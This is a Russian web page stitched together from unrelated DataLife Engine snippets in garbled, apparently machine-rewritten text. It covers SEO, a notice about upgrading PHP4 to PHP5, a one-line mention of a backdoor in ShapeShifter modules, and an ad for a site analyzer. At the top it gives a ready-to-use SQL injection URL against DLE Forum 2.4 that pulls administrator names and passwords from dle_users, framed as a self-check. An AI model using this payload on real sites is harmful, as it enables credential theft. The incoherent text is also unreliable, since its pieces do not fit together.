В DataLife Engine Forum v.2.4 есть уязвимость, которая дозволяет исполнять запросы в бд, и узнавать всякую инфу, к примеру о логинах и о паролях.
У кого стоит данная версия форума, рекомендуется проверить на уязвимость:
ваш_сайт.ру/?do=forum&showtopic=-
1+union+select+1,2,CONCAT_WS( 0x3a,name,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23+from+dle_users+where+user_group=1+limit+1--,

Поначалу хочу увидеть, статья полезна тем кто употребляет DataLife Engine лишь для варезоподобных страниц,онлайн киноленты, софтовики, новостники, cайты визитки, порталы, статейные сайты и т.д. собственно я считаю этот движок намного удачный от сходственных движков которых в сети пруд приди. И вот функция доп полей чрезвычайно упрощает нам жизнь при прибавление однотипных материалов.

И так начнем вести речь о внутренней оптимизацию страниц на движке DataLife Engine(он же DataLife Engine).

Дорогие друзья,

Равномерно прибывает время когда нужно увеличивать требования к мало установленному ПО, чтоб скрипт мог продолжать свое развитие.

В данном случае речь пойдет о версии PHP установленном на сервере. Сейчас наименьшим требованием к PHP, является версия 4.3.x и выше, но 4-ая линейка тормозит развитие скрипта, потому все же нужно тем у кого на сервере установлена еще 4-ая линейка, переходить на PHP5.

Итак начиная с новейшей версии скрипта, рекомендуемой версией PHP, будет является версия 5.1.0 и выше. Это нужно будет для помощи новейших функций DataLife Engine, одной из таковых будет к примеру возможность ZIP сжатия JS файлов скрипта, в итоге которой их размер будет меньше в пару разов, и соответственно намного прыткое их загрузка, также принудительное кеширование их в браузере, чтоб они позже не загружались второй раз.

Наличие PHP5 не будет наименьшим требованием для новейшей версии, и DataLife Engine сумеет работать на PHP4, но он автоматом отключит не поддерживаемые новейшие способности. И с каждой версией таковых отключаемых способностей будет больше и больше.

Потому просьба все же отыскать время и обновить безнадежно обветшавший PHP4 на PHP5, пока еще есть время сделать это не спеша не торопясь.

автор: celsoft

Бекдор и стучалка в модулях от ShapeShifter


Суть бекдора в том что бы выслать известие Шиферу( ShapeShifter)изSavGroup и создать пользователя ModPolice с правами админа для последующего ликвидирования Вашего сайта.


Отыскал Бекдор: Zloy(WFound)

Существует множество анализаторов сайта, как он-лайн, так и офф-версий. Вашему вниманию предлагаю маленькую програмку анализатор, написаннную на флэш. Её способности велики, а удачный и доступный интерфэйс делают вашу работу с ней наиболее удобной.